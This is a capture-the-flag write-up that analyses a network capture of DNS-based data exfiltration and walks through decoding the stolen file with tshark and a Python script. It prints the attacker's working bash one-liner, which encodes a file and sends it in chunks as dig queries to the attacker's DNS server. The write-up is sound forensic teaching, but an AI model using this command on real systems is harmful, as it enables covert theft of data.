We have a network traffic capture.
From the description and the type of file we know it is a data exfiltration challenge.
Data exfiltration is the theft or unauthorized transfer of data from a device or network to a server controlled by the attacker.

After analyzing the file I found DNS requests and HTTP traffic.

Let's check the DNS requests.

I see requests from IP:
172.168.40.2
to 192.168.1.130
Victim IP:
172.168.40.2
Malicious DNS server IP:
192.168.1.130
But the query names are not plain base encoding or hex, so we need more analysis :)
Now I will try to analyze the HTTP requests.
After saving the HTTP data I see something weird:

f=file.txt; s=2;b=5;c=0; for r in $(for i in $(gzip -c $f| xxd -p | base32 -w0 | base64 -w0 |sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.1.130 `echo -ne $r|tr "+" "*"|tr "Q" "$"` +short; sleep 1s; done
That is weird: it should be a CSS file, not a bash script.
That means the attacker used this script to exfiltrate the data.

User-Agent: Wget
That means the script was downloaded from the server with the wget command.
Now it's time to understand the code.
The script gzips file.txt, hex-dumps it with xxd -p, then base32- and base64-encodes the result. sed splits that output into chunks of 5 characters (b=5), and the inner loop puts 2 chunks per line (s=2), each chunk followed by "-.". Each line becomes one DNS query name: tr swaps "+" for "*" and "Q" for "$", then dig sends the name to the attacker's server at 192.168.1.130, sleeping one second between queries.

First I ran the script on my own network to see what traffic it generates.
Now we need to get the DNS requests:
tshark -r ctf.pcap.pcapng -e "dns.qry.name" -T fields -Y "ip.dst==192.168.1.130"
I used tshark to get them:
-r sets the filename to read from
-e selects the field we want to output (here the queried name), and -T fields prints only those fields
-Y is the display filter; I use it to select only packets sent to the malicious DNS server
Now after saving the data we need to reverse the encoding to get the flag, following the script's pipeline from the end back to the start:
replace
$
with Q
replace
*
with +
remove
.
and -
and decode it as base64
and decode it as base32
and decode it as hex
and gunzip the result
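As an added example (not part of the original writeup), the decoder below reverses the captured script's pipeline step by step, and an encoder that mirrors the script is included only to construct sample query names offline; the sample text is made up and is not the challenge data. It assumes the query names are fed in the order tshark printed them, one per line, and that the original used xxd -p with its default width of 60 hex digits per line (those line breaks survive inside the base32 layer and must be stripped before unhexlifying).

```python
import base64
import binascii
import gzip
from typing import List

# Forward direction, mirroring the attacker's pipeline:
#   gzip -c | xxd -p | base32 -w0 | base64 -w0 | chunks of b chars,
#   s chunks per query, each chunk followed by "-.", then tr "+" "*" and tr "Q" "$"
def encode_like_script(data: bytes, s: int = 2, b: int = 5) -> List[str]:
    gz = gzip.compress(data)
    hex_text = binascii.hexlify(gz).decode()
    # xxd -p wraps at 60 hex digits (30 bytes) per newline-terminated line;
    # those newlines are part of what gets base32-encoded
    xxd_out = "".join(hex_text[i:i + 60] + "\n" for i in range(0, len(hex_text), 60))
    b32 = base64.b32encode(xxd_out.encode()).decode()
    b64 = base64.b64encode(b32.encode()).decode()
    chunks = [b64[i:i + b] for i in range(0, len(b64), b)]
    names = []
    for i in range(0, len(chunks), s):
        qname = "".join(chunk + "-." for chunk in chunks[i:i + s])
        # the two tr calls in the script
        qname = qname.translate(str.maketrans("+Q", "*$"))
        # tshark prints dns.qry.name without the trailing root dot
        names.append(qname[:-1])
    return names

def parse_tshark_output(text: str) -> List[str]:
    # one query name per line, as printed by tshark -T fields -e dns.qry.name
    return [line.strip() for line in text.splitlines() if line.strip()]

def decode_queries(names: List[str]) -> bytes:
    joined = "".join(names)
    # undo the label separators, then the character substitutions
    b64 = joined.replace("-", "").replace(".", "").translate(str.maketrans("*$", "+Q"))
    b32 = base64.b64decode(b64)
    xxd_out = base64.b32decode(b32)
    # the xxd -p line breaks are still in here; drop them before unhexlifying
    gz = binascii.unhexlify(b"".join(xxd_out.split()))
    return gzip.decompress(gz)

# constructed sample, not the challenge data
SAMPLE = b"constructed sample file, not the challenge data\n"

if __name__ == "__main__":
    names = encode_like_script(SAMPLE)
    print("\n".join(names))
    print(decode_queries(parse_tshark_output("\n".join(names))))
```

To use it on the real capture, save the tshark output to a file, read it, and pass it through parse_tshark_output and decode_queries; if the result fails to gunzip, check that no query was duplicated or dropped in the capture, since a single missing chunk breaks every layer below it.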

Now I will extract it.
